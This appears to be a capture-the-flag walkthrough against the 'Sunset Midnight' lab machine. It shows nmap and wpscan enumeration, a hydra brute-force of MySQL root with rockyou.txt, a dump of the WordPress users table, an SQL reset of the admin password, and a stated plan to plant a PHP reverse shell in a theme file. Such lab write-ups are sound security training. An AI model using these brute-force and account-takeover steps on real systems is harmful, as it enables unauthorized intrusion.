PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
3306/tcp filtered mysql
When we try to visit http://192.168.164.88/wp-admin we saw a DNS http://sunset-midnight
Adding sunset-midnight to /etc/hosts
192.168.164.88 sunset-midnight
Now we can view the website
┌──(kali㉿kali)-[~]
└─$ wpscan --url <http://sunset-midnight/>
_______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://sunset-midnight/> [192.168.164.88]
[+] Started: Thu Aug 11 08:55:23 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: <http://sunset-midnight/robots.txt>
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://sunset-midnight/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] Upload directory has listing enabled: <http://sunset-midnight/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://sunset-midnight/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - <http://sunset-midnight/feed/>, <generator><https://wordpress.org/?v=5.4.2></generator>
| - <http://sunset-midnight/comments/feed/>, <generator><https://wordpress.org/?v=5.4.2></generator>
[+] WordPress theme in use: twentyseventeen
| Location: <http://sunset-midnight/wp-content/themes/twentyseventeen/>
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: <http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt>
| [!] The version is out of date, the latest version is 3.0
| Style URL: <http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507>
| Style Name: Twenty Seventeen
| Style URI: <https://wordpress.org/themes/twentyseventeen/>
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507>, Match: 'Version: 2.3'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simply-poll-master
| Location: <http://sunset-midnight/wp-content/plugins/simply-poll-master/>
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt>
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - <http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt>
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:02:23 <================================================================================================================> (137 / 137) 100.00% Time: 00:02:23
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>
┌──(kali㉿kali)-[~]
└─$ wpscan --url <http://sunset-midnight/> --enumerate u
<......SNIPPET......>
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - <http://sunset-midnight/wp-json/wp/v2/users/?per_page=100&page=1>
| Oembed API - Author URL (Aggressive Detection)
| - <http://sunset-midnight/wp-json/oembed/1.0/embed?url=http://sunset-midnight/&format=json>
| Rss Generator (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
We will try to bruteforce the MySQL since the webpage is super lagging
┌──(kali㉿kali)-[~]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnight mysql
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2022-08-11 09:16:23
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://sunset-midnight:3306/
[3306][mysql] host: sunset-midnight login: root password: robert
1 of 1 target successfully completed, 1 valid password found
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2022-08-11 09:17:02
Knowing the password is robert
┌──(kali㉿kali)-[~]
└─$ mysql -u root -p -h sunset-midnight
Enter password: robert
Welcome to the MariaDB monitor. Commands end with ; or \\g.
Your MariaDB connection id is 949
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.
MariaDB [(none)]> use wordpress_db
MariaDB [wordpress_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin | [email protected] | <http://sunset-midnight> | 2020-07-16 19:10:47 | | 0 | admin |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.237 sec)
MariaDB [wordpress_db]>
From here, we know that the user_pass could be updated since we have root privilege on mysql, we will generate a MD5 hash password from https://www.md5hashgenerator.com/
UPDATE wp_users SET user_pass="5f4dcc3b5aa765d61d8327deb882cf99" WHERE ID=1;
MariaDB [wordpress_db]> UPDATE wp_users SET user_pass="5f4dcc3b5aa765d61d8327deb882cf99" WHERE ID=1;
Query OK, 1 row affected (0.229 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Now we had changed the admin password to password, now we can login to the wordpress page and we can add php-reverse-shell to the twentyseventeen 404.php
